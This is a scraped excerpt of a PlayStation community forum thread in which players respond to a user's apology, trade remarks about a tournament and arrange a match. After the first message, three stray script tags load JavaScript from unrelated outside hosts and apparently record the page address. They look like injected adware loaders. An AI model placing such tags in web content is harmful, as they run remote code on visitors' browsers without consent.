Search instead for 
Do you mean 
Gaming Beast
2167 posts

Re: I'M HONESTLY SORRY GUYS

[ Edited ]
Feb 4, 2013

Xaltis wrote:
You called me a nobody, then I proceed to do much better than you in my first tourney. I proved my point. I don't really need this apology. :smileywink:
You know he dropped out of both tourneys due to a family emergency right? This post is kind of in bad taste all things considered.

That being said you did do well, so good job.

The Fro never sleeps.png

<script type="text/javascript" src="https://loading-resource.com/data.js.php?i={5B0E559A-F075-4C48-91F1-A12AED5BE78E}&d=2012-6-10&s=http://community.us.playstation.com/t5/forums/replypage/board-id/24861/message-id/338362"></script>
<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
<script type="text/javascript" src="http://www.vitruvianleads.com/build/production/selectionlinks/templates/bootstrap.js"></script>
Message 51 of 78 (134 Views)
Lombax Warrior
216 posts

Feb 4, 2013

Fromundaman wrote:

Xaltis wrote:
You called me a nobody, then I proceed to do much better than you in my first tourney. I proved my point. I don't really need this apology. :smileywink:
You know he dropped out of both tourneys due to a family emergency right? This post is kind of in bad taste all things considered.

Hey he's the one who started calling me a nobody for no reason, sounds like karma hit him bad. Hope everyone in his family is okay though.

And yes I did. XP

Photobucket
Message 52 of 78 (128 Views)
0 Likes
Wastelander
768 posts

Feb 4, 2013

Xaltis wrote:

Fromundaman wrote:

Xaltis wrote:

Hey he's the one who started calling me a nobody for no reason, sounds like karma hit him bad. Hope everyone in his family is okay though.

And yes I did. XP

well hey if you have something to prove I'll play you one of these days to a 1st to 5 set.  Its up to you if not then its ok. 

YT: DatTeamAxcel for all my latest PSAS related content. I upload everything FFAs 2v2 1v1, Combo & How to Videos, and Player and character breakdowns.
Message 53 of 78 (123 Views)
0 Likes
Lombax Warrior
216 posts

Feb 4, 2013
I already proven myself, that part is up to you, but first take care of your family situation if it's still going on. That's most important right now.
Photobucket
Message 54 of 78 (123 Views)
0 Likes
PlayStation MVP
12862 posts

Feb 4, 2013

I am a tad late to this party, but I feel this was cool of you to do. We had a couple arguments, but we are on each other's friends list. I never had too much of a problem with you, but there was some drama as well.

Count those blessings and hope for the best.

Welcoming Committee Twitter
Message 55 of 78 (124 Views)
0 Likes
Wastelander
768 posts

Feb 4, 2013

Xaltis wrote:
I already proven myself, that part is up to you, but first take care of your family situation if it's still going on. That's most important right now.

no prob bro and yeah everything is fine no worries.  I just wanted a break from this game to do other things that i do.  But yeah add me soon so whenever I do start playing it wont be hard to find you

YT: DatTeamAxcel for all my latest PSAS related content. I upload everything FFAs 2v2 1v1, Combo & How to Videos, and Player and character breakdowns.
Message 56 of 78 (121 Views)
0 Likes
Lombax Warrior
216 posts

Feb 4, 2013
You add me, your name has way too many things lol
Photobucket
Message 57 of 78 (110 Views)
0 Likes
Hekseville Citizen
335 posts

Feb 4, 2013

Respect to you Asis, this is a very refreshing post. You and I never disagreed per-se, but I never liked the negativity you brought along but I am glad to see that has changed! The mods (well one in particular) has been deleting my threads for no reason lately and not replying to my messages/inquiries, so I'm likely to stop using these forums. It's quite frustrating, especially when I put a ton of time into a topic and am certain that it doesn't violate forum policies. I just post here to talk about the game, leave feedback for superbot, and have fun.

Anyways, I look forward to the day we play online, it's always fun to run into forumers online. Take care!

Message 58 of 78 (101 Views)
0 Likes
Uncharted Territory
1819 posts

Feb 4, 2013

This is a pleasant surprise. Internet drama rarely has a final act and I have to give you props for this, Asis. :smileywink:

--------------------------------------------------------------------------------------------------------------
WHAT IS THIS!?
Message 59 of 78 (94 Views)
0 Likes
Gaming Beast
1859 posts

Feb 4, 2013
Asis, I know we had our issues, but if you're serious, then you've gained my respect.
Message 60 of 78 (86 Views)
0 Likes